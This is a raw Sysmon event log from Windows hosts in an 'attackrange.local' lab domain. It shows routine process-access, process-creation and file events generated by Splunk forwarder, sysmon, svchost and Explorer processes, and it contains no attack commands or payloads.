08:05:15.739{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61935-false10.0.1.12-8000- 10341000x8000000000000000809943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.819{0C1E0330-F7C5-60EB-D079-00000000D001}34364072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.664{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C73E09AA0B3151157219B6D98D18AB,SHA256=581658017F8879C66CE29C70DB21602A9E8F0A2C7722F9EB2F61F1CBA0C6AB44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC995AD580CD30CC571C527B7F3038DB,SHA256=0973BB5E2079FE8AEAE2A91261A4070FBAAE59006CFCDA3C44FE41EED1FC9553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE337B53E89D473AA36828EEBAB82E1B,SHA256=14A5E6E7C9BC659B620675FB3DFE9701CAE90876213A089DC9AE1EBA3396B246,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.979{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.979{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.229{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=1C538E1E8F255E67F92EA9564955691B,SHA256=4BA704E2FCE227292B8E5788A60C0E7E6E9B243C0AD861BA3B1A97E1502044C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B81287C6446FBA8C3BD59F9B6D6F45C2,SHA256=9F9CE0F20CF63EDD9E9F0EDA67DBB0AE831CE897AB5BDA52F90A3716EB72424A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.710{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C73E09AA0B3151157219B6D98D18AB,SHA256=581658017F8879C66CE29C70DB21602A9E8F0A2C7722F9EB2F61F1CBA0C6AB44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52337CA498DF87388EA43D548A210328,SHA256=254E607C1D460BB8A2E787C7859A3FACC888C37450C7492BE5A112AAD72B2845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:26.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED848E8361C01D4E9C95F58152EDCC66,SHA256=C30A3390578891FFB39AF8EBBEC4112372FDD2118180D22779B48CF88755BD7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C6-60EB-D179-00000000D001}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:26.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 